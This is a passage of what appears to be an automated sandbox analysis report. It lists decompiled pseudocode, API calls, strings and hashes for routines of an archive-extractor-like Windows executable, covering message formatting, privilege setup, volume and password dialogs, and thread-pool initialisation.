									_push( *((intOrPtr*)(__esi + 4)));
									__eax = E00A3E617(0xd2);
									return __eax;
								case 0x10:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x79);
									goto L13;
								case 0x11:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0xdc);
									L13:
									_push(E00A3E617());
									_push( *_t57);
									goto L8;
							}
						}
					}
				}
				L64:
				return _t33;
			}

0x00a41606
0x00a4160c
0x00a4160e
0x00a41611
0x00a41614
0x00a4183f
0x00a41844
0x00a41846
0x00a4184b
0x00a4184f
0x00a4188c
0x00a41851
0x00a4186b
0x00a41870
0x00000000
0x00a418ab
0x00a4161a
0x00a4161a
0x00a41835
0x00a4175e
0x00a41763
0x00a41764
0x00a416a1
0x00a416a1
0x00a4166a
0x00000000
0x00a4166a
0x00a41620
0x00a41623
0x00a41723
0x00a41726
0x00a417e6
0x00a417e6
0x00a417e9
0x00a4182b
0x00000000
0x00a4182b
0x00a417eb
0x00a417eb
0x00a417ee
0x00a41824
0x00000000
0x00a41824
0x00a417f0
0x00a417f0
0x00a417f3
0x00a41817
0x00a4181a
0x00000000
0x00a4181a
0x00a417f5
0x00a417f5
0x00a417f8
0x00a4180d
0x00000000
0x00a4180d
0x00a417fa
0x00a417fa
0x00a417fd
0x00a41803
0x00000000
0x00a41803
0x00a4172c
0x00a4172c
0x00a417df
0x00000000
0x00a417df
0x00a41732
0x00a41735
0x00a41738
0x00a4173e
0x00000000
0x00a41745
0x00000000
0x00000000
0x00a4174f
0x00000000
0x00000000
0x00a41759
0x00000000
0x00000000
0x00a4176b
0x00000000
0x00000000
0x00a4176f
0x00000000
0x00000000
0x00a41773
0x00a41776
0x00000000
0x00000000
0x00a4177d
0x00000000
0x00000000
0x00a41784
0x00000000
0x00000000
0x00a4178b
0x00a4178e
0x00000000
0x00000000
0x00000000
0x00000000
0x00a41798
0x00a4179b
0x00000000
0x00000000
0x00a417b0
0x00a417bc
0x00a417c1
0x00a417c4
0x00a417ca
0x00000000
0x00000000
0x00a4173e
0x00a41738
0x00a41629
0x00a41629
0x00a4171a
0x00a4171c
0x00a416be
0x00a416be
0x00a41646
0x00a41646
0x00a41648
0x00000000
0x00a4164d
0x00a41632
0x00a41638
0x00000000
0x00a41655
0x00a41657
0x00a4165c
0x00000000
0x00000000
0x00a4163f
0x00a41641
0x00000000
0x00000000
0x00a41663
0x00a41665
0x00000000
0x00000000
0x00a41670
0x00a41673
0x00000000
0x00000000
0x00a4167f
0x00a41682
0x00000000
0x00000000
0x00a41686
0x00a41689
0x00000000
0x00000000
0x00a4168d
0x00a41690
0x00000000
0x00000000
0x00a41697
0x00a41699
0x00a4169e
0x00a4169f
0x00000000
0x00000000
0x00a416a9
0x00a416ac
0x00000000
0x00000000
0x00a416b0
0x00a416b3
0x00000000
0x00000000
0x00a416b7
0x00a416b9
0x00000000
0x00000000
0x00a416c6
0x00a416c8
0x00000000
0x00000000
0x00a416cf
0x00a416d2
0x00000000
0x00000000
0x00a416d9
0x00a416dc
0x00000000
0x00000000
0x00000000
0x00000000
0x00a416e3
0x00a416e6
0x00a416ee
0x00000000
0x00000000
0x00a41703
0x00a41706
0x00000000
0x00000000
0x00a4170d
0x00a41710
0x00a41675
0x00a4167a
0x00a4167b
0x00000000
0x00000000
0x00a41638
0x00a41632
0x00a41623
0x00a418b2
0x00a418b2

APIs

_swprintf.LIBCMT ref: 00A417BC
_swprintf.LIBCMT ref: 00A4186B

Strings

%s: %s, xrefs: 00A417CB
%ls, xrefs: 00A41641, 00A41657

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: 34488da08cdf4b883c07660adb7d7bbe8b5dcdaf649822c0137efbb86b1ed502
Instruction ID: 7cccfdf2e370946a897e55b233290730ab853f7e35f67632a32dd83597d3a854
Opcode Fuzzy Hash: 34488da08cdf4b883c07660adb7d7bbe8b5dcdaf649822c0137efbb86b1ed502
Instruction Fuzzy Hash: 0251EB3D388300F6F6215B908E87F35B6B6AB85B05F244506F396644E1DAA2E4D0AB1B

Uniqueness

Uniqueness Score: -1.00%

Function 00A57F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00A57F6E(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				intOrPtr* _t36;
				struct HINSTANCE__* _t37;
				struct HINSTANCE__* _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				CHAR* _t49;
				struct HINSTANCE__* _t50;
				void* _t52;
				struct HINSTANCE__* _t55;
				intOrPtr* _t59;
				struct HINSTANCE__* _t64;
				intOrPtr _t65;

				_t52 = __ecx;
				if(_a4 == 2 || _a4 == 1) {
					E00A5BB30(_t52);
					GetModuleFileNameA(0, 0xa92128, 0x104);
					_t49 =  *0xa926d8; // 0x863308
					 *0xa926e0 = 0xa92128;
					if(_t49 == 0 ||  *_t49 == 0) {
						_t49 = 0xa92128;
					}
					_v8 = 0;
					_v16 = 0;
					E00A58092(_t52, _t49, 0, 0,  &_v8,  &_v16);
					_t64 = E00A58207(_v8, _v16, 1);
					if(_t64 != 0) {
						E00A58092(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t50 = E00A5B643(_t64);
							if(_t50 == 0) {
								_t59 = _v12;
								_t55 = 0;
								_t36 = _t59;
								if( *_t59 == 0) {
									L15:
									_t37 = 0;
									 *0xa926cc = _t55;
									_v12 = 0;
									_t50 = 0;
									 *0xa926d0 = _t59;
									L16:
									E00A58DCC(_t37);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t36 = _t36 + 4;
									_t55 =  &(_t55->i);
								} while ( *_t36 != 0);
								goto L15;
							}
							_t37 = _v12;
							goto L16;
						}
						 *0xa926cc = _v8 - 1;
						_t43 = _t64;
						_t64 = 0;
						 *0xa926d0 = _t43;
						goto L10;
					} else {
						_t44 = E00A591A8();
						_push(0xc);
						_pop(0);
						 *_t44 = 0;
						L10:
						_t50 = 0;
						L17:
						E00A58DCC(_t64);
						return _t50;
					}
				} else {
					_t45 = E00A591A8();
					_t65 = 0x16;
					 *_t45 = _t65;
					E00A59087();
					return _t65;
				}
			}

0x00a57f6e
0x00a57f7b
0x00a57f9b
0x00a57fae
0x00a57fb4
0x00a57fba
0x00a57fc2
0x00a57fc9
0x00a57fc9
0x00a57fce
0x00a57fd5
0x00a57fdc
0x00a57fee
0x00a57ff5
0x00a58014
0x00a58020
0x00a5803b
0x00a5803e
0x00a58045
0x00a5804b
0x00a58052
0x00a58055
0x00a58057
0x00a5805b
0x00a58065
0x00a58065
0x00a58067
0x00a5806d
0x00a58070
0x00a58072
0x00a58078
0x00a58079
0x00a5807f
0x00000000
0x00000000
0x00000000
0x00000000
0x00a5805d
0x00a5805d
0x00a5805d
0x00a58060
0x00a58061
0x00000000
0x00a5805d
0x00a5804d
0x00000000
0x00a5804d
0x00a58026
0x00a5802b
0x00a5802d
0x00a5802f
0x00000000
0x00a57ff7
0x00a57ff7
0x00a57ffc
0x00a57ffe
0x00a57fff
0x00a58034
0x00a58034
0x00a58082
0x00a58083
0x00000000
0x00a5808c
0x00a57f83
0x00a57f83
0x00a57f8a
0x00a57f8b
0x00a57f8d
0x00000000
0x00a57f92

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\file.exe,00000104), ref: 00A57FAE
_free.LIBCMT ref: 00A58079
_free.LIBCMT ref: 00A58083

Strings

C:\Users\user\Desktop\file.exe, xrefs: 00A57FA5, 00A57FAC, 00A57FDB, 00A58013

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\file.exe
API String ID: 2506810119-2502435711
Opcode ID: fa6ca5ec15ecd4a6c46f8c6f57235efe7dd97c042323c45ceb1077bc1523478d
Instruction ID: 557eb389c0ee9ae978ce9060ada13c0853922d8a0eb23303bf74a3c70f0e7120
Opcode Fuzzy Hash: fa6ca5ec15ecd4a6c46f8c6f57235efe7dd97c042323c45ceb1077bc1523478d
Instruction Fuzzy Hash: 6831BFB1A00218AFCB21DF94988499EBBFCFF94302F104066FD04A7251DA748E49CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A37401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00A37401(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _t31;
				long _t38;
				void* _t45;
				void* _t48;
				intOrPtr _t49;
				void* _t62;
				void* _t63;
				void* _t66;

				_t62 = __esi;
				_t48 = __ebx;
				E00A4EB78(0xa627b7, _t66);
				E00A4EC50(0x1060);
				 *((intOrPtr*)(_t66 - 0x20)) = 0;
				 *((intOrPtr*)(_t66 - 0x1c)) = 0;
				 *((intOrPtr*)(_t66 - 0x18)) = 0;
				 *((intOrPtr*)(_t66 - 0x14)) = 0;
				 *((char*)(_t66 - 0x10)) = 0;
				_t59 =  *((intOrPtr*)(_t66 + 8));
				_push(0);
				_push(0);
				 *((intOrPtr*)(_t66 - 4)) = 0;
				_push(_t66 - 0x20);
				if(E00A33BBA( *((intOrPtr*)(_t66 + 8))) != 0) {
					if( *0xa71022 == 0) {
						if(E00A37A9C(L"SeSecurityPrivilege") != 0) {
							 *0xa71021 = 1;
						}
						E00A37A9C(L"SeRestorePrivilege");
						 *0xa71022 = 1;
					}
					_push(_t62);
					_t63 = 7;
					if( *0xa71021 != 0) {
						_t63 = 0xf;
					}
					_push(_t48);
					_t49 =  *((intOrPtr*)(_t66 - 0x20));
					_push(_t49);
					_push(_t63);
					_push( *((intOrPtr*)(_t66 + 0xc)));
					if( *0xa93000() == 0) {
						if(E00A3BB03( *((intOrPtr*)(_t66 + 0xc)), _t66 - 0x106c, 0x800) == 0) {
							L10:
							E00A32021(_t75, 0x52, _t59 + 0x32,  *((intOrPtr*)(_t66 + 0xc)));
							_t38 = GetLastError();
							E00A36DCB(0xa71098, _t75);
							if(_t38 == 5 && E00A407BC() == 0) {
								E00A315C6(_t66 - 0x6c, 0x18);
								E00A415FE(_t66 - 0x6c);
							}
							E00A36D83(0xa71098, 1);
						} else {
							_t45 =  *0xa93000(_t66 - 0x106c, _t63, _t49);
							_t75 = _t45;
							if(_t45 == 0) {
								goto L10;
							}
						}
					}
				}
				_t31 =  *((intOrPtr*)(_t66 - 0x20));
				 *((intOrPtr*)(_t66 - 4)) = 2;
				if(_t31 != 0) {
					if( *((char*)(_t66 - 0x10)) != 0) {
						E00A3F445(_t31,  *((intOrPtr*)(_t66 - 0x18)));
						_t31 =  *((intOrPtr*)(_t66 - 0x20));
					}
					_t31 = L00A53E2E(_t31);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t66 - 0xc));
				return _t31;
			}

0x00a37401
0x00a37401
0x00a37406
0x00a37410
0x00a37418
0x00a3741b
0x00a3741e
0x00a37421
0x00a37424
0x00a37427
0x00a3742c
0x00a3742d
0x00a3742e
0x00a37434
0x00a3743c
0x00a37449
0x00a37457
0x00a37459
0x00a37459
0x00a37465
0x00a3746a
0x00a3746a
0x00a37478
0x00a3747b
0x00a3747c
0x00a37480
0x00a37480
0x00a37481
0x00a37482
0x00a37485
0x00a37486
0x00a37487
0x00a37492
0x00a374aa
0x00a374bf
0x00a374c8
0x00a374cd
0x00a374dc
0x00a374e4
0x00a374f4
0x00a374fc
0x00a374fc
0x00a37505
0x00a374ac
0x00a374b5
0x00a374bb
0x00a374bd
0x00000000
0x00000000
0x00a374bd
0x00a374aa
0x00a3750b
0x00a3750c
0x00a3750f
0x00a37519
0x00a3751f
0x00a37525
0x00a3752a
0x00a3752a
0x00a3752e
0x00a37533
0x00a37537
0x00a3753f

APIs

__EH_prolog.LIBCMT ref: 00A37406

Part of subcall function 00A33BBA: __EH_prolog.LIBCMT ref: 00A33BBF

GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 00A374CD

Part of subcall function 00A37A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00A37AAB
Part of subcall function 00A37A9C: GetLastError.KERNEL32 ref: 00A37AF1
Part of subcall function 00A37A9C: CloseHandle.KERNEL32(?), ref: 00A37B00

Strings

SeRestorePrivilege, xrefs: 00A37460
SeSecurityPrivilege, xrefs: 00A3744B

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: e799e450d8d7e8b4d0036090c43826be5dcae3db3425e8ea871b17fe1ada558e
Instruction ID: 265e360f978c3f9d1de6d419bd852e5fe44f20b90e7f88af4220504d7639a15d
Opcode Fuzzy Hash: e799e450d8d7e8b4d0036090c43826be5dcae3db3425e8ea871b17fe1ada558e
Instruction Fuzzy Hash: 4031E3B1E04248AADF21EFA4DD45FFEBBB8BF45300F048015F845A7282CB748A85CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A4AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00A4AD10(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR** _a16) {
				void* _t12;
				void* _t16;
				void* _t19;
				void* _t22;
				WCHAR** _t24;
				intOrPtr _t27;
				void* _t28;
				struct HWND__* _t30;
				signed short _t31;

				_t24 = _a16;
				_t31 = _a12;
				_t30 = _a4;
				_t27 = _a8;
				if(E00A31316(__edx, _t30, _t27, _t31, _t24, L"ASKNEXTVOL", 0, 0) != 0) {
					L14:
					__eflags = 1;
					return 1;
				}
				_t28 = _t27 - 0x110;
				if(_t28 == 0) {
					_push( *_t24);
					 *0xa91cb8 = _t24;
					L13:
					SetDlgItemTextW(_t30, 0x66, ??);
					goto L14;
				}
				if(_t28 != 1) {
					L6:
					return 0;
				}
				_t12 = (_t31 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t30, 0x66,  *( *0xa91cb8), ( *0xa91cb8)[1]);
					_push(1);
					L10:
					EndDialog(_t30, ??);
					goto L14;
				}
				_t16 = _t12 - 1;
				if(_t16 == 0) {
					_push(0);
					goto L10;
				}
				if(_t16 == 0x65) {
					_t19 = E00A3C29A(__eflags,  *( *0xa91cb8));
					_t22 = E00A31100(_t30, E00A3E617(0x8e),  *( *0xa91cb8), _t19, 0);
					__eflags = _t22;
					if(_t22 == 0) {
						goto L14;
					}
					_push( *( *0xa91cb8));
					goto L13;
				}
				goto L6;
			}

0x00a4ad11
0x00a4ad16
0x00a4ad1b
0x00a4ad20
0x00a4ad38
0x00a4adc8
0x00a4adca
0x00000000
0x00a4adca
0x00a4ad3e
0x00a4ad44
0x00a4adb7
0x00a4adb9
0x00a4adbf
0x00a4adc2
0x00000000
0x00a4adc2
0x00a4ad49
0x00a4ad5d
0x00000000
0x00a4ad5d
0x00a4ad4e
0x00a4ad51
0x00a4adad
0x00a4adb3
0x00a4ad97
0x00a4ad98
0x00000000
0x00a4ad98
0x00a4ad53
0x00a4ad56
0x00a4ad95
0x00000000
0x00a4ad95
0x00a4ad5b
0x00a4ad6a
0x00a4ad83
0x00a4ad88
0x00a4ad8a
0x00000000
0x00000000
0x00a4ad91
0x00000000
0x00a4ad91
0x00000000

APIs

Part of subcall function 00A31316: GetDlgItem.USER32(00000000,00003021), ref: 00A3135A
Part of subcall function 00A31316: SetWindowTextW.USER32(00000000,00A635F4), ref: 00A31370

EndDialog.USER32(?,00000001), ref: 00A4AD98
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00A4ADAD
SetDlgItemTextW.USER32(?,00000066,?), ref: 00A4ADC2

Strings

ASKNEXTVOL, xrefs: 00A4AD28

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 676f29f6b48e8e266b24abf8beadfe89024ddd9d8f1317a40df17ac99816995e
Instruction ID: aff070ea0c081bb39de99f50a259df7050280f057d964911900216df2cc28857
Opcode Fuzzy Hash: 676f29f6b48e8e266b24abf8beadfe89024ddd9d8f1317a40df17ac99816995e
Instruction Fuzzy Hash: 9E11C836BC0200BFE711DFA9DD45FAA7B79EFAA742F000511F241EB4A0CB619906D722

Uniqueness

Uniqueness Score: -1.00%

Function 00A3D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00A3D8EC(void* __ebx, void* __ecx, void* __edx) {
				void* __esi;
				void* _t22;
				intOrPtr _t26;
				signed int* _t30;
				void* _t33;
				void* _t41;
				void* _t43;
				void* _t45;
				void* _t47;
				void* _t49;
				void* _t50;

				_t43 = __edx;
				_t42 = __ecx;
				_t41 = __ebx;
				_t47 = _t49 - 0x64;
				_t50 = _t49 - 0xac;
				_t45 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x2c)) <= 0) {
					L12:
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t47 + 0x5c)) =  *((intOrPtr*)(_t47 + 0x6c));
					 *((char*)(_t47 + 8)) = 0;
					 *((intOrPtr*)(_t47 + 0x60)) = _t47 + 8;
					if( *((intOrPtr*)(_t47 + 0x74)) != 0) {
						E00A41DA7( *((intOrPtr*)(_t47 + 0x74)), _t47 - 0x48, 0x50);
					}
					_t26 =  *((intOrPtr*)(_t47 + 0x70));
					if(_t26 == 0) {
						E00A405A7(_t47 + 8, "s", 0x50);
					} else {
						_t33 = _t26 - 1;
						if(_t33 == 0) {
							_push(_t47 - 0x48);
							_push("$%s");
							goto L8;
						} else {
							if(_t33 == 1) {
								_push(_t47 - 0x48);
								_push("@%s");
								L8:
								_push(0x50);
								_push(_t47 + 8);
								E00A3E5B1();
								_t50 = _t50 + 0x10;
							}
						}
					}
					_t30 = E00A56159(_t41, _t42, _t43, _t45, _t47 + 0x58,  *((intOrPtr*)(_t45 + 0x14)),  *((intOrPtr*)(_t45 + 0x18)), 4, E00A3D710);
					if(_t30 == 0) {
						goto L12;
					} else {
						_t20 = 0xa6e278 +  *_t30 * 0xc; // 0xa64788
						E00A567C0( *((intOrPtr*)(_t47 + 0x78)),  *_t20,  *((intOrPtr*)(_t47 + 0x7c)));
						_t22 = 1;
					}
				}
				return _t22;
			}

0x00a3d8ec
0x00a3d8ec
0x00a3d8ec
0x00a3d8ed
0x00a3d8f1
0x00a3d8f8
0x00a3d8fe
0x00a3d9a6
0x00a3d9a6
0x00a3d904
0x00a3d90b
0x00a3d911
0x00a3d915
0x00a3d918
0x00a3d923
0x00a3d923
0x00a3d92b
0x00a3d92e
0x00a3d969
0x00a3d930
0x00a3d930
0x00a3d933
0x00a3d948
0x00a3d949
0x00000000
0x00a3d935
0x00a3d938
0x00a3d93d
0x00a3d93e
0x00a3d94e
0x00a3d951
0x00a3d953
0x00a3d954
0x00a3d959
0x00a3d959
0x00a3d938
0x00a3d933
0x00a3d97f
0x00a3d989
0x00000000
0x00a3d98b
0x00a3d991
0x00a3d99a
0x00a3d9a2
0x00a3d9a2
0x00a3d989
0x00a3d9ad

APIs

__fprintf_l.LIBCMT ref: 00A3D954
_strncpy.LIBCMT ref: 00A3D99A

Part of subcall function 00A41DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00A71030,?,00A3D928,00000000,?,00000050,00A71030), ref: 00A41DC4

Strings

@%s, xrefs: 00A3D93E
$%s, xrefs: 00A3D949

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 562999700-834177443
Opcode ID: 95423eef971a7c0f8e4ff58a4388a8e9514c2498a8252031bb982a3be6b76b27
Instruction ID: d746ef74ac9f0c483138f53292be9b219ccf59532f1eceacce118650645329ae
Opcode Fuzzy Hash: 95423eef971a7c0f8e4ff58a4388a8e9514c2498a8252031bb982a3be6b76b27
Instruction Fuzzy Hash: 78219A72840248EEEF21EFA4DD02FEE7BB8AF15300F040562FA10965A2E272D6499F51

Uniqueness

Uniqueness Score: -1.00%

Function 00A40E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00A40E46(long* __ecx, long _a4) {
				void* __esi;
				void* __ebp;
				long _t11;
				void* _t14;
				long _t23;
				long* _t25;

				_t19 = __ecx;
				_t11 = _a4;
				_t25 = __ecx;
				_t23 = 0x40;
				 *__ecx = _t11;
				if(_t11 <= _t23) {
					if(_t11 == 0) {
						 *__ecx = 1;
						_t11 = 1;
					}
				} else {
					 *__ecx = _t23;
					_t11 = _t23;
				}
				_t25[0x41] = 0;
				if(_t11 > _t23) {
					 *_t25 = _t23;
				}
				_t3 =  &(_t25[0xc8]); // 0x320
				_t25[0xc5] = 0;
				InitializeCriticalSection(_t3);
				_t25[0xc6] = CreateSemaphoreW(0, 0, _t23, 0);
				_t14 = CreateEventW(0, 1, 1, 0);
				_t25[0xc7] = _t14;
				if(_t25[0xc6] == 0 || _t14 == 0) {
					_push(L"\nThread pool initialization failed.");
					_push(0xa71098);
					E00A36C31(E00A36C36(_t19), 0xa71098, _t25, 2);
				}
				_t25[0xc3] = 0;
				_t25[0xc4] = 0;
				_t25[0x42] = 0;
				return _t25;
			}

0x00a40e46
0x00a40e46
0x00a40e4e
0x00a40e54
0x00a40e56
0x00a40e5a
0x00a40e64
0x00a40e66
0x00a40e68
0x00a40e68
0x00a40e5c
0x00a40e5c
0x00a40e5e
0x00a40e5e
0x00a40e6c
0x00a40e74
0x00a40e76
0x00a40e76
0x00a40e78
0x00a40e7e
0x00a40e85
0x00a40e99
0x00a40e9f
0x00a40ea5
0x00a40eb1
0x00a40eb7
0x00a40ec1
0x00a40ecd
0x00a40ecd
0x00a40ed3
0x00a40edb
0x00a40ee1
0x00a40eea

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00A3AC5A,00000008,?,00000000,?,00A3D22D,?,00000000), ref: 00A40E85
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00A3AC5A,00000008,?,00000000,?,00A3D22D,?,00000000), ref: 00A40E8F
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00A3AC5A,00000008,?,00000000,?,00A3D22D,?,00000000), ref: 00A40E9F

Strings

Thread pool initialization failed., xrefs: 00A40EB7

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: e6c3a92bec485568e816be2ceac85e2e7537048fa0079d899c5866e528230f53
Instruction ID: 1f15a51ddcf26aed10f9f6eb12a74751f4d278688251833baabf1f549097e027
Opcode Fuzzy Hash: e6c3a92bec485568e816be2ceac85e2e7537048fa0079d899c5866e528230f53
Instruction Fuzzy Hash: C111A3B2600708AFC3219F7A9C859A7FBECEB99744F108C2EF1DAC3200D6B559519B50

Uniqueness

Uniqueness Score: -1.00%

Function 00A4B270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00A4B270(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				short _v260;
				void* __ebx;
				void* _t15;
				signed short _t24;
				struct HWND__* _t28;
				intOrPtr _t29;
				void* _t30;

				_t24 = _a12;
				_t29 = _a8;
				_t28 = _a4;
				if(E00A31316(__edx, _t28, _t29, _t24, _a16, L"GETPASSWORD1", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t30 = _t29 - 0x110;
				if(_t30 == 0) {
					SetDlgItemTextW(_t28, 0x67, _a16);
					goto L10;
				}
				if(_t30 != 1) {
					L5:
					return 0;
				}
				_t15 = (_t24 & 0x0000ffff) - 1;
				if(_t15 == 0) {
					GetDlgItemTextW(_t28, 0x66,  &_v260, 0x80);
					E00A3F3FA(_t24, 0xa87a78,  &_v260);
					E00A3F445( &_v260, 0x80);
					_push(1);
					L7:
					EndDialog(_t28, ??);
					goto L10;
				}
				if(_t15 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}

0x00a4b27a
0x00a4b27e
0x00a4b282
0x00a4b29b
0x00a4b30a
0x00000000
0x00a4b30c
0x00a4b29d
0x00a4b2a3
0x00a4b304
0x00000000
0x00a4b304
0x00a4b2a8
0x00a4b2b7
0x00000000
0x00a4b2b7
0x00a4b2ad
0x00a4b2b0
0x00a4b2d6
0x00a4b2e8
0x00a4b2f5
0x00a4b2fa
0x00a4b2bd
0x00a4b2be
0x00000000
0x00a4b2be
0x00a4b2b5
0x00a4b2bb
0x00000000
0x00a4b2bb
0x00000000

APIs

